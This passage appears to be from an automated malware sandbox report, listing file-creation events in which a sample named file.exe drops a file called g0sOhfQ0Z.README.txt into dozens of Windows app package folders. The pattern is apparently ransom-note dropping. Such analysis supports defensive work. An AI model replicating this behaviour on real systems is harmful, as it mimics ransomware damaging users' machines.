            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\TempState\ShareCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState\Traces\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\Flighting\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{383cd175-ae3a-4e7b-8db0-9b5863f23264}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{311bc890-0d64-4a61-ae62-e2a43e6cb7e1}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{fcc86364-ccd0-4b6b-bbd4-ed188fa53d71}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{f0d0601b-1ca9-4fc2-a498-8f1b2c1353a6}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{c489dd0d-bac7-4129-ae50-28d7b3fe49ef}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{bff69808-bf5a-45c4-83b2-159e16a88092}\g0sOhfQ0Z.README.txtJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{9a11bead-4a31-4027-b6a3-4965899ddc4e}\g0sOhfQ0Z.README.txtJump to behavior
